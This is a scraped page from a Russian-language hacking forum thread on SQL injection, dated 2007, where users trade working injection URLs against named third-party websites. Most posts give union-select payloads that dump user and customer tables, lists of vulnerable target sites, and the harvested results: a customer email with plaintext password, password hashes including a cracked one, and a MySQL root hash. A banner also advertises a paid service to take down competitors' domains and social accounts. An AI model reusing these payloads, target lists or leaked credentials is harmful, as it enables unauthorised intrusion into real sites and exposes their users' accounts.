Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 51 из 1242

Опции темы

Поиск в этой теме

Опции просмотра

#501

14.02.2007, 02:18

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

хмм и админка на виду

Total Members: 3776

Последний раз редактировалось }{0TT@БЬ)Ч; 14.02.2007 в 02:23..

#502

14.02.2007, 03:11

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

2Thanat0z
для перебора можно использывать специальные тулзы, если не дает результата то уже ручками, просто иногда бывает что в таблице 50-60 столбцов...

#503

14.02.2007, 03:16

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

Цитата:

Сообщение от [ cash ]

или через order by

#504

14.02.2007, 03:37

Thanat0z

Постоянный

Регистрация: 06.12.2006

Сообщений: 762

Провел на форуме:
5352530

Репутация: 2062

Цитата:

Сообщение от [ cash ]

я знаю, скриптик выкладывали в "полезные скрипты". Иногда просто нет предпосылок в виде "не то количество колонок", и такие я руками пробую, а иначе скриптом после 10 где-то. Если не катит через юнионселект, пробую через ордербай

#505

14.02.2007, 04:31

pop_korn

Участник форума

Регистрация: 13.09.2005

Сообщений: 170

Провел на форуме:
483324

Репутация: 92

http://www.eclectichomeschool.org/support/state.asp?stateid=(select+top+1+table_name+from+in formation_schema.tables)--

#506

14.02.2007, 05:59

Thanat0z

Постоянный

Регистрация: 06.12.2006

Сообщений: 762

Провел на форуме:
5352530

Репутация: 2062

Инет-магазины (почти все):

Не нашел таблиц, лоадфайл вроде не работает:

Код:

__http://www.magic-pony.com/product.php?id=-1894+union+select+1,2,3,4,5,6,user,8,9,10,11,12,13,14/*&category=art
__http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,4,user(),6,7/*

ошибки:

Код:

__http://amvets.fundlinkllc.com/showcategory.php?id=61'
__https://shop.invictusnetworks.com/detail.php?id=16026'
__http://www.usenetportal.com/detail.php?id=713'
__http://www.alicebxl.com/artsale.php?id=16'
__http://www.rocbattle.com/battle_details.php?id=37519'

странное чувство, что здесь есть скуль, сам не нашел:

Код:

__http://www.juniperresearch.com/shop/viewreport.php?id=-28'
__http://www.juniperresearch.com/shop/viewpressrelease.php?pr=-44'

#507

14.02.2007, 09:41

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Thanat0z,

Код:

http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,concat(email,0x3a,password),5,6,7+from+customers/*

wes@joedesigns.com:flash62

тут email=login

#508

14.02.2007, 16:07

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Отправить сообщение для ice1k с помощью ICQ

Код:

http://www.mikeosx.com/newsphp/show.php?id=-99+union+select+1,2,3,4,concat(name,0x3a,pass),6,7,8,9,10+from+users+limit+1,1/*

powermic:52609e00b7ee307e79eb100099b9a8bf
powermic:fingerprint

Код:

http://www.foxreality.com/show.php?id=-99+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x545f7573657273+limit+23,1/*

etc...
=\

Последний раз редактировалось ice1k; 14.02.2007 в 16:27..

#509

14.02.2007, 19:05

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

Провел на форуме:
2848854

Репутация: 409

Отправить сообщение для злюка с помощью ICQ

_http://www.fotosale.com.ua/index.php?mod=prodList&cid=1&bid=-99+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,15,6,1 7/*

как всегда с названием таблци юзверей проблема((

#510

14.02.2007, 19:50

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Код:

http://www.nregion.com/txt.php?i=-8943+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9+from+mysql.user/*

root:*2E4549A9308C1DFA3E3A1645E3CFD8E787134CBC

Страница 51 из 1242

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход